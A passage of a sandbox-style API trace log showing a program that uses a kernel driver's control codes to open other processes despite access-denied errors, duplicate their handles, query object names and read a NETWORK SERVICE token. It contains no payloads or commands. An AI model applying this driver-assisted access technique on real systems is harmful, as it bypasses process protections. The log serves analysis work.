ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.770] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00147d61880, HandleInformation=0x0) returned 0x0 [0252.770] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.770] PsReleaseProcessExitSynchronization () returned 0x2 [0252.770] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fd6 [0252.770] ObQueryNameString (in: Object=0xffffc00147d61880, ObjectNameInfo=0xffffe0006845f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006845f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.770] ObfDereferenceObject (Object=0xffffc00147d61880) returned 0x1a7c8c [0252.770] IoCompleteRequest () returned 0x0 [0252.770] CloseHandle (hObject=0x19c) returned 1 [0252.770] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xdec) returned 0x19c [0252.770] GetCurrentProcess () returned 0xffffffffffffffff [0252.770] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.770] CloseHandle (hObject=0x19c) returned 1 [0252.770] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.770] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.770] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.771] PsLookupProcessByProcessId (in: ProcessId=0xdec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.771] PsAcquireProcessExitSynchronization () returned 0x0 [0252.771] KeStackAttachProcess (in: PROCESS=0xffffe000685a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000685a6840, ApcState=0xffffd000b1b8e400) [0252.771] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a45bd80, HandleInformation=0x0) returned 0x0 [0252.771] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.771] PsReleaseProcessExitSynchronization () returned 0x2 [0252.771] ObfDereferenceObject (Object=0xffffe000685a6840) returned 0x2001d [0252.771] ObQueryNameString (in: Object=0xffffe0006a45bd80, ObjectNameInfo=0xffffe000684657c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684657c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.771] ObfDereferenceObject (Object=0xffffe0006a45bd80) returned 0xffff [0252.771] IoCompleteRequest () returned 0x0 [0252.771] CloseHandle (hObject=0x1a0) returned 1 [0252.771] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xdec) returned 0x1a0 [0252.771] GetCurrentProcess () returned 0xffffffffffffffff [0252.771] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.771] CloseHandle (hObject=0x1a0) returned 1 [0252.771] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.771] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.771] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x5e, lpOverlapped=0x0) returned 1 [0252.771] PsLookupProcessByProcessId (in: ProcessId=0xdec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.771] PsAcquireProcessExitSynchronization () returned 0x0 [0252.771] KeStackAttachProcess (in: PROCESS=0xffffe000685a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000685a6840, ApcState=0xffffd000b1b8e400) [0252.771] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e544b0, HandleInformation=0x0) returned 0x0 [0252.771] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.771] PsReleaseProcessExitSynchronization () returned 0x2 [0252.771] ObfDereferenceObject (Object=0xffffe000685a6840) returned 0x2001b [0252.771] ObQueryNameString (in: Object=0xffffe00067e544b0, ObjectNameInfo=0xffffe00068485044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068485044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.771] ObfDereferenceObject (Object=0xffffe00067e544b0) returned 0x1bfd56 [0252.771] IoCompleteRequest () returned 0x0 [0252.771] CloseHandle (hObject=0x19c) returned 1 [0252.771] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xdec) returned 0x19c [0252.771] GetCurrentProcess () returned 0xffffffffffffffff [0252.771] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.771] CloseHandle (hObject=0x19c) returned 1 [0252.771] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.771] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.772] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x1a, lpOverlapped=0x0) returned 1 [0252.772] PsLookupProcessByProcessId (in: ProcessId=0xdec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.772] PsAcquireProcessExitSynchronization () returned 0x0 [0252.772] KeStackAttachProcess (in: PROCESS=0xffffe000685a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000685a6840, ApcState=0xffffd000b1b8e400) [0252.772] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069711840, HandleInformation=0x0) returned 0x0 [0252.772] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.772] PsReleaseProcessExitSynchronization () returned 0x2 [0252.772] ObfDereferenceObject (Object=0xffffe000685a6840) returned 0x20019 [0252.772] ObQueryNameString (in: Object=0xffffe00069711840, ObjectNameInfo=0xffffe0006845d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006845d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.772] ObfDereferenceObject (Object=0xffffe00069711840) returned 0x137de7 [0252.772] IoCompleteRequest () returned 0x0 [0252.772] CloseHandle (hObject=0x1a0) returned 1 [0252.772] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x48c) returned 0x1a0 [0252.772] GetCurrentProcess () returned 0xffffffffffffffff [0252.772] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.772] CloseHandle (hObject=0x1a0) returned 1 [0252.772] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.772] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.772] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.772] PsLookupProcessByProcessId (in: ProcessId=0x48c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.772] PsAcquireProcessExitSynchronization () returned 0x0 [0252.772] KeStackAttachProcess (in: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000b1b8e400) [0252.772] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a528380, HandleInformation=0x0) returned 0x0 [0252.772] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.772] PsReleaseProcessExitSynchronization () returned 0x2 [0252.772] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x28013 [0252.772] ObQueryNameString (in: Object=0xffffe0006a528380, ObjectNameInfo=0xffffe000690897c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690897c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.772] ObfDereferenceObject (Object=0xffffe0006a528380) returned 0xfffe [0252.772] IoCompleteRequest () returned 0x0 [0252.772] CloseHandle (hObject=0x19c) returned 1 [0252.772] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x48c) returned 0x19c [0252.772] GetCurrentProcess () returned 0xffffffffffffffff [0252.772] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.772] CloseHandle (hObject=0x19c) returned 1 [0252.772] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.772] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.773] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x4a, lpOverlapped=0x0) returned 1 [0252.773] PsLookupProcessByProcessId (in: ProcessId=0x48c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.773] PsAcquireProcessExitSynchronization () returned 0x0 [0252.773] KeStackAttachProcess (in: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000b1b8e400) [0252.773] ObReferenceObjectByHandle (in: Handle=0x13c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a711ab0, HandleInformation=0x0) returned 0x0 [0252.773] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.773] PsReleaseProcessExitSynchronization () returned 0x2 [0252.773] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x28011 [0252.773] ObQueryNameString (in: Object=0xffffe0006a711ab0, ObjectNameInfo=0xffffe000684e97c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684e97c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.773] ObfDereferenceObject (Object=0xffffe0006a711ab0) returned 0xffff [0252.773] IoCompleteRequest () returned 0x0 [0252.773] CloseHandle (hObject=0x1a0) returned 1 [0252.773] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xf74) returned 0x0 [0252.773] GetLastError () returned 0x5 [0252.773] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0252.773] ZwOpenProcess (in: ProcessHandle=0xffffe0006a519a40, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0xf74, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a519a40*=0x1a0) returned 0x0 [0252.773] IoCompleteRequest () returned 0x0 [0252.773] GetCurrentProcess () returned 0xffffffffffffffff [0252.773] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x130, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.773] CloseHandle (hObject=0x1a0) returned 1 [0252.773] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.773] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.773] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xf74) returned 0x0 [0252.773] GetLastError () returned 0x5 [0252.773] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0252.773] ZwOpenProcess (in: ProcessHandle=0xffffe0006a519a40, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0xf74, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a519a40*=0x1a0) returned 0x0 [0252.773] IoCompleteRequest () returned 0x0 [0252.773] GetCurrentProcess () returned 0xffffffffffffffff [0252.773] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x130, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x8, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a4) returned 1 [0252.773] CloseHandle (hObject=0x1a0) returned 1 [0252.773] GetTokenInformation (in: TokenHandle=0x1a4, TokenInformationClass=0x1, TokenInformation=0x14dbc0, TokenInformationLength=0x800, ReturnLength=0x14d4b4 | out: TokenInformation=0x14dbc0, ReturnLength=0x14d4b4) returned 1 [0252.773] LookupAccountSidW (in: lpSystemName="", Sid=0x14dbd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x14d9b0, cchName=0x14d4bc, ReferencedDomainName=0x14d7a0, cchReferencedDomainName=0x14d4b8, peUse=0x14d4e8 | out: Name="NETWORK SERVICE", cchName=0x14d4bc, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14d4b8, peUse=0x14d4e8) returned 1 [0256.682] GetTokenInformation (in: TokenHandle=0x1a4, TokenInformationClass=0xa, TokenInformation=0x14d568, TokenInformationLength=0x38, ReturnLength=0x14d4b4 | out: TokenInformation=0x14d568, ReturnLength=0x14d4b4) returned 1 [0256.682] GetLastError () returned 0x5 [0256.683] SetLastError (dwErrCode=0x5) [0256.683] GetLastError () returned 0x5 [0256.683] SetLastError (dwErrCode=0x5) [0256.683] CloseHandle (hObject=0x1a4) returned 1 [0256.683] CloseHandle (hObject=0x19c) returned 1 [0256.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x9b0) returned 0x19c [0256.683] GetCurrentProcess () returned 0xffffffffffffffff [0256.683] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x8a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a4) returned 1 [0256.683] CloseHandle (hObject=0x19c) returned 1 [0256.683] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.683] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.683] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.683] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.683] PsAcquireProcessExitSynchronization () returned 0x0 [0256.683] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000b1b8e400) [0256.683] ObReferenceObjectByHandle (in: Handle=0x8a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a3b510, HandleInformation=0x0) returned 0x0 [0256.683] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.683] PsReleaseProcessExitSynchronization () returned 0x2 [0256.683] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x401d6 [0256.683] ObQueryNameString (in: Object=0xffffe00069a3b510, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.683] ObfDereferenceObject (Object=0xffffe00069a3b510) returned 0xfff9 [0256.683] IoCompleteRequest () returned 0x0 [0256.684] CloseHandle (hObject=0x1a4) returned 1 [0256.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x820) returned 0x1a4 [0256.684] GetCurrentProcess () returned 0xffffffffffffffff [0256.684] DuplicateHandle (in: hSourceProcessHandle=0x1a4, hSourceHandle=0x10d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0256.684] CloseHandle (hObject=0x1a4) returned 1 [0256.684] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.684] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.684] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.684] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.684] PsAcquireProcessExitSynchronization () returned 0x0 [0256.684] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000b1b8e400) [0256.684] ObReferenceObjectByHandle (in: Handle=0x10d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a2f7590, HandleInformation=0x0) returned 0x0 [0256.684] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.684] PsReleaseProcessExitSynchronization () returned 0x2 [0256.684] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e9cb [0256.684] ObQueryNameString (in: Object=0xffffe0006a2f7590, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.684] ObfDereferenceObject (Object=0xffffe0006a2f7590) returned 0xffff [0256.684] IoCompleteRequest () returned 0x0 [0256.684] CloseHandle (hObject=0x19c) returned 1 [0256.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x7c8) returned 0x19c [0256.684] GetCurrentProcess () returned 0xffffffffffffffff [0256.684] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x5f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a4) returned 1 [0256.684] CloseHandle (hObject=0x19c) returned 1 [0256.684] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.684] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.684] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.684] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.684] PsAcquireProcessExitSynchronization () returned 0x0 [0256.684] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000b1b8e400) [0256.684] ObReferenceObjectByHandle (in: Handle=0x5f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a010ad0, HandleInformation=0x0) returned 0x0 [0256.684] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.684] PsReleaseProcessExitSynchronization () returned 0x2 [0256.684] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x38055 [0256.684] ObQueryNameString (in: Object=0xffffe0006a010ad0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.685] ObfDereferenceObject (Object=0xffffe0006a010ad0) returned 0x17fb1 [0256.685] IoCompleteRequest () returned 0x0 [0256.685] CloseHandle (hObject=0x1a4) returned 1 [0256.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x44c) returned 0x1a4 [0256.685] GetCurrentProcess () returned 0xffffffffffffffff [0256.685] DuplicateHandle (in: hSourceProcessHandle=0x1a4, hSourceHandle=0x464, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0256.685] CloseHandle (hObject=0x1a4) returned 1 [0256.685] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ed480, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2ed480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0256.685] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000b1b8e3d8 | out: Process=0xffffd000b1b8e3d8) returned 0x0 [0256.685] PsAcquireProcessExitSynchronization () returned 0x0 [0256.685] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e3f8 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e3f8) [0256.685] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e3e0, HandleInformation=0x0 | out: Object=0xffffd000b1b8e3e0*=0xffffe00069a40a10, HandleInformation=0x0) returned 0x0 [0256.685] PsReleaseProcessExitSynchronization () returned 0x2 [0256.685] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x40020 [0256.685] ZwQueryObject (in: Handle=0x464, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000b1b8e3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000b1b8e3d4) returned 0xc0000004 [0256.685] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xffffc0014aee46d0 [0256.685] ZwQueryObject (in: Handle=0x464, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014aee46d0, ObjectInformationLength=0x80, ReturnLength=0x0 | out: 